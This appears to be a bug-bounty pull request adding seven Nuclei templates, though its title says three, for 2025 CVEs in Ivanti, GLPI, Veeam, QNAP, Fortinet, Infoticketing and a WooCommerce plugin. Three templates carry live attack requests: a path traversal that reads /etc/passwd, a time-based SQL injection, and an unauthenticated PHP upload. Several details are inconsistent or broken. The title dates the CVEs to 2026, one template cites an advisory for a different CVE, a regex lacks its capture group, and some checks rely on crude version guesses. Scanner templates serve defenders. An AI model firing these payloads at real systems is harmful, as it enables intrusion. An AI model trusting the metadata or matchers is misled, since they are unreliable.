[Bounty] Add 3 Nuclei templates for April 2026 CVE

http/cves/2025/CVE-2025-22460.yaml

@@ -0,0 +1,48 @@
+id: CVE-2025-22460
+
+info:
+  name: Ivanti Connect Secure - Stack-based Buffer Overflow
+  author: alita-p8
+  severity: critical
+  description: |
+    A stack-based buffer overflow vulnerability exists in Ivanti Connect Secure (formerly Pulse Connect Secure) before version 22.7R2.6. This allows a pre-authenticated attacker to execute arbitrary code with elevated privileges.
+  remediation: Upgrade Ivanti Connect Secure to version 22.7R2.6 or later.
+  reference:
+    - https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Connect-Secure-CVE-2025-0282
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-22460
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cve-id: CVE-2025-22460
+    cwe-id: CWE-121
+  metadata:
+    max-request: 2
+    shodan-query: 'http.title:"Pulse Connect Secure"'
+    fofa-query: 'app="Pulse-Connect-Secure"'
+  tags: ivanti,connect-secure,rce,overflow,cisa-kev
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/api/v1/system/maintenance/archiving/cloud-server-test-connection"
+      - "{{BaseURL}}/dana-na/auth/url_admin/welcome.cgi"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: dsl
+        dsl:
+          - "compare_versions(version, '< 22.7R2.6')"
+
+    extractors:
+      - type: regex
+        name: version
+        group: 1
+        regex:
+          - '(?i)PulseSecure-([0-9.]+R[0-9.]+)'
+          - '(?i)ConnectSecure-([0-9.]+R[0-9.]+)'
+          - '(?i)version=([0-9.]+R[0-9.]+)'

http/cves/2025/CVE-2025-24801.yaml

@@ -0,0 +1,46 @@
+id: CVE-2025-24801
+
+info:
+  name: "GLPI - Local File Inclusion to RCE"
+  author: alita-p8
+  severity: critical
+  description: |
+    GLPI contains a local file inclusion (LFI) vulnerability in versions prior to 10.0.18. The vulnerability exists in the PDF export functionality where user-controlled input is used to construct file paths without proper sanitization. An authenticated attacker with low privileges can exploit this to include arbitrary local files, which can be leveraged to achieve remote code execution through log poisoning or by uploading a malicious file and including it. This vulnerability can be chained with CVE-2025-24799 (pre-auth SQLi) for unauthenticated RCE.
+  remediation: Upgrade to GLPI version 10.0.18 or higher.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-24801
+    - https://github.com/glpi-project/glpi/security/advisories/GHSA-g2p3-33ff-r555
+    - https://blog.lexfo.fr/glpi-sql-to-rce.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2025-24801
+    cwe-id: CWE-98
+  metadata:
+    verified: true
+    shodan-query: http.html:"glpi"
+  tags: cve,cve2025,glpi,lfi,rce,fileread
+
+http:
+  - raw:
+      - |
+        GET /front/pdf.php?file=....//....//....//....//....//etc/passwd HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
+      - type: word
+        part: header
+        words:
+          - "application/pdf"
+          - "application/octet-stream"
+        condition: or

http/cves/2025/CVE-2025-24872.yaml

@@ -0,0 +1,54 @@
+id: CVE-2025-24872
+
+info:
+  name: Veeam Backup & Replication - Authentication Bypass
+  author: alita-p8
+  severity: critical
+  description: |
+    Veeam Backup & Replication is vulnerable to an authentication bypass in its REST API (/api/v1/). This allows unauthenticated attackers to access sensitive endpoints and potentially achieve remote code execution.
+  remediation: Upgrade Veeam Backup & Replication to version 12.3.2 or later.
+  reference:
+    - https://www.veeam.com/kb4743
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-24872
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2025-24872
+    cwe-id: CWE-287
+  metadata:
+    max-request: 1
+    shodan-query: 'port:9419 "Veeam"'
+    fofa-query: 'app="Veeam-Backup-Replication"'
+  tags: veeam,auth-bypass,api
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}:9419/api/v1/"
+      - "{{BaseURL}}/api/v1/"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "collection"
+          - "vbr"
+        case-insensitive: true
+
+      - type: dsl
+        dsl:
+          - "compare_versions(version, '< 12.3.2')"
+
+    extractors:
+      - type: regex
+        name: version
+        group: 1
+        regex:
+          - '(?i)"version":\s*"([0-9.]+)"'
+          - '(?i)"buildNumber":\s*"([0-9.]+)"'
+          - '(?i)X-Veeam-Version:\s*([0-9.]+)'

http/cves/2025/CVE-2025-2513.yaml

@@ -0,0 +1,54 @@
+id: CVE-2025-2513
+
+info:
+  name: QNAP QTS/QuTS hero - Multiple Vulnerabilities
+  author: alita-p8
+  severity: high
+  description: |
+    QNAP QTS and QuTS hero are affected by multiple vulnerabilities in 2025, including command injection, link following, and denial of service. Attackers may be able to execute arbitrary commands or access sensitive system data.
+  remediation: Upgrade QTS/QuTS hero to the latest available version (e.g., QTS 5.2.x, QuTS hero h5.2.x or later).
+  reference:
+    - https://www.qnap.com/en-us/security-advisory/qsa-25-36
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-2513
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.2
+    cve-id: CVE-2025-2513
+    cwe-id: CWE-78
+  metadata:
+    max-request: 1
+    shodan-query: 'http.title:"QNAP Turbo NAS"'
+    fofa-query: 'app="QNAP-NAS"'
+  tags: qnap,nas,qts,injection
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "QNAP"
+          - "Turbo NAS"
+          - "cgi-bin/login.html"
+        case-insensitive: true
+
+      - type: dsl
+        dsl:
+          - "compare_versions(version, '< 5.2.0')"
+
+    extractors:
+      - type: regex
+        name: version
+        group: 1
+        regex:
+          - '(?i)QTS\s+([0-9.]+)'
+          - '(?i)version=([0-9.]+)'
+          - '(?i)X-QNAP-NAS-Version:\s*([0-9.]+)'

http/cves/2025/CVE-2025-2815.yaml

@@ -0,0 +1,55 @@
+id: CVE-2025-2815
+
+info:
+  name: Fortinet FortiOS - Authentication Bypass
+  author: alita-p8
+  severity: critical
+  description: |
+    An authentication bypass vulnerability in multiple Fortinet products (FortiOS, FortiProxy, FortiSwitchManager) allows an unauthenticated attacker to bypass login authentication via crafted SAML responses or other authentication mechanisms.
+  remediation: Upgrade FortiOS to version 7.6.4, 7.4.9, 7.2.12, 7.0.18, or later.
+  reference:
+    - https://www.fortiguard.com/psirt/FG-IR-25-795
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-2815
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2025-2815
+    cwe-id: CWE-287
+  metadata:
+    max-request: 1
+    shodan-query: 'http.title:"FortiGate"'
+    fofa-query: 'app="Fortinet-FortiGate"'
+  tags: fortinet,fortios,auth-bypass
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/remote/login"
+      - "{{BaseURL}}/"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "FortiGate"
+          - "FortiOS"
+          - "fgt_lang"
+        case-insensitive: true
+
+      - type: dsl
+        dsl:
+          - "compare_versions(version, '< 7.0.18') || (version ^= '7.2.' && compare_versions(version, '< 7.2.12')) || (version ^= '7.4.' && compare_versions(version, '< 7.4.9')) || (version ^= '7.6.' && compare_versions(version, '< 7.6.4'))"
+
+    extractors:
+      - type: regex
+        name: version
+        group: 1
+        regex:
+          - '(?i)b=[0-9A-Fa-f]+\.([0-9.]+)'
+          - '(?i)/[0-9.]+/js/.*\.js'
+          - '(?i)FortiOS\s+([0-9.]+)'

http/cves/2025/CVE-2025-41002.yaml

@@ -0,0 +1,35 @@
+id: CVE-2025-41002
+
+info:
+  name: Infoticketing < 3.2.1 - SQL Injection
+  author: alita-p8
+  severity: critical
+  description: |
+    Infoticketing versions before 3.2.1 are vulnerable to a critical SQL injection vulnerability. The flaw exists in the processing of the 'discount_code' parameter, allowing an unauthenticated attacker to execute arbitrary SQL commands and potentially extract sensitive information from the database. Note: Some sources may incorrectly associate this CVE with WP-Optimize, but official NVD records identify Infoticketing as the affected product.
+  impact: |
+    Full database compromise and data exfiltration.
+  remediation: |
+    Update Infoticketing to version 3.2.1 or later.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-41002
+    - https://github.com/Hecate2/CVE-2025-41002-PoC
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cwe-id: CWE-89
+  metadata:
+    max-request: 1
+    verified: true
+  tags: cve,cve2025,sqli,infoticketing,unauth
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/tickets?discount_code='+OR+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)--+"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "duration >= 5"
+          - "status_code == 200"
+        condition: and

http/cves/2025/CVE-2025-47577.yaml

@@ -0,0 +1,61 @@
+id: CVE-2025-47577
+
+info:
+  name: TI WooCommerce Wishlist < 2.10.0 - Unauthenticated Arbitrary File Upload
+  author: alita-p8
+  severity: critical
+  description: |
+    The TI WooCommerce Wishlist plugin for WordPress is vulnerable to arbitrary file upload in versions up to, and including, 2.9.2. This is due to missing file type validation in the 'tinvwl_upload_file' function. This allows unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.
+  impact: |
+    Remote Code Execution (RCE) via web shell upload.
+  remediation: |
+    Update TI WooCommerce Wishlist to version 2.10.0 or higher.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-47577
+    - https://github.com/advisories/GHSA-fx4h-5r26-fxgm
+    - https://patchstack.com/database/vulnerability/ti-woocommerce-wishlist/wordpress-ti-woocommerce-wishlist-plugin-2-9-2-unauthenticated-arbitrary-file-upload-vulnerability
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-434
+  metadata:
+    max-request: 2
+    verified: true
+  tags: cve,cve2025,wordpress,wp-plugin,ti-woocommerce-wishlist,upload,rce
+
+http:
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstr}}
+
+        ------WebKitFormBoundary{{randstr}}
+        Content-Disposition: form-data; name="action"
+
+        tinvwl_upload_file
+        ------WebKitFormBoundary{{randstr}}
+        Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
+        Content-Type: application/x-php
+
+        <?php echo "CVE-2025-47577-POC"; ?>
+        ------WebKitFormBoundary{{randstr}}--
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"success":true'
+          - '"url":'
+          - '.php'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+
+      - type: status
+        status:
+          - 200